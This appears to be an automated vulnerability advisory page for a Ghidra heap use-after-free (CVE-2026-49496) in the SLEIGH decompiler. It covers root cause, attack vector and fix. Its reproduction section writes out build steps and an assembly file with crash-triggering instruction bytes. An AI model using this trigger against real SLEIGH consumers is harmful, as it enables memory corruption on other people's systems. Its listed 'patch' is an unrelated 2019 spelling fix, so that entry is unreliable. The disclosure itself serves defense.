Medium severity6.1NVD Advisory· Published Jun 10, 2026· Updated Jun 10, 2026

CVE-2026-49496

Description

Ghidra before 12.1 contains a heap-use-after-free vulnerability in SleighBuilder::generatePointerAdd caused by iterator invalidation when PcodeCacher::allocateInstruction reallocates the issued vector. Attackers can trigger memory corruption by decompiling malicious binaries through the public Sleigh::oneInstruction C++ API, affecting downstream SLEIGH library consumers.

Affected products

Nationalsecurityagency/Ghidrareferences2 versions
(expand)+ 1 more
- (no CPE)
- (no CPE)range: <12.1

Patches

8a3018d5efcb

https://github.com/nationalsecurityagency/ghidravia nvd-ref

commit

01b989a8df3e

fix spelling of commercial (#14)

https://github.com/nationalsecurityagency/ghidraBrandonMar 6, 2019via body-scan-shorthand

commit PR #14

1 file changed · +1 −1

DISCLAIMER.md+1 −1 modified

@@ -10,4 +10,4 @@ The User of this Work agrees to hold harmless and indemnify the United States Go
 
 Nothing in this Work is intended to constitute an endorsement, explicit or implied, by the United States Government of any particular manufacturer's product or service.
 
-Reference herein to any specific commerical product, process, or service by trade name, trademark, manufacturer, or otherwise, in this Work does not constitute an endorsement, recommendation, or favoring by the United States Government and shall not be used for advertising or product endorsement purposes.
+Reference herein to any specific commercial product, process, or service by trade name, trademark, manufacturer, or otherwise, in this Work does not constitute an endorsement, recommendation, or favoring by the United States Government and shall not be used for advertising or product endorsement purposes.

Vulnerability mechanics

Root cause

"An iterator invalidation occurs when PcodeCacher::allocateInstruction reallocates a vector, leading to a use-after-free."

Attack vector

An attacker can trigger this vulnerability by providing a malicious binary for decompilation. This binary is processed through the public Sleigh::oneInstruction C++ API, which internally calls SleighBuilder::generatePointerAdd. This function, in turn, calls PcodeCacher::allocateInstruction, which can invalidate pointers into the issued vector, leading to memory corruption when these invalidated pointers are subsequently used [ref_id=1].

Affected code

The vulnerability resides in the `SleighBuilder::generatePointerAdd` function within `sleigh.cc`. The issue is triggered when `PcodeCacher::allocateInstruction` is called, which is part of the process of generating p-code for instructions. This function can be reached via the public `Sleigh::oneInstruction()` C++ API [ref_id=1].

What the fix does

The patches address the iterator invalidation issue by ensuring that pointers into the `issued` vector remain valid even when `PcodeCacher::allocateInstruction` causes a reallocation. Specifically, the changes prevent `generatePointerAdd` from using a pointer that may have been invalidated by the `allocateInstruction` call, thereby closing the use-after-free vulnerability [patch_id=5478760, patch_id=5478761].

Preconditions

inputA malicious binary that, when decompiled, triggers the vulnerable code path.

Reproduction

```bash # Build the native SLEIGH compiler make -j$(nproc) sleigh_opt

# Compile x86_64 .sla from .slaspec ./sleigh_opt ../../../../../Processors/x86/data/languages/x86-64.slaspec

# Compile decomp_opt with ASAN make decomp_opt CXX="clang++ -std=c++11" \ OPT_CXXFLAGS="-g -fsanitize=address -fno-omit-frame-pointer -O1" -j$(nproc)

# Prepare an ELF with the crashing instruction cat > crash_elf.s << 'EOF' .section .text .globl crash_func .type crash_func, @function crash_func: /* 0f c6 00 0a = shufps xmm0, [rax], 0xa (trigger bytes) */ .byte 0x0f, 0xc6, 0x00, 0x0a ret .size crash_func, .-crash_func

.globl _start .type _start, @function _start: xor %edi, %edi mov $60, %eax syscall .size _start, .-_start EOF

gcc -nostdlib -no-pie -o crash_elf crash_elf.s

# Prepare decomp commands file cat > crash_elf.txt << 'EOF' load file crash_elf set context longMode 0 0x0 0xffffffffffff set context addrsize 1 0x0 0xffffffffffff set context opsize 1 0x0 0xffffffffffff load addr 0x401000 crash_func decompile quit EOF

# Decompile SLEIGHHOME=../../../../../../ ./decomp_opt -i crash_elf.txt ```

Generated on Jun 10, 2026. Inputs: CWE entries + fix-commit diffs from this CVE's patches. Citations validated against bundle.

References

News mentions

National Security Agency's Ghidra: 15 Vulnerabilities Disclosed on June 10, 2026
Vypr Intelligence · Jun 10, 2026

cvss	0.397
epss	0.000
exploit	0.000
kev	0.000
patch	-0.070
ransomware	0.000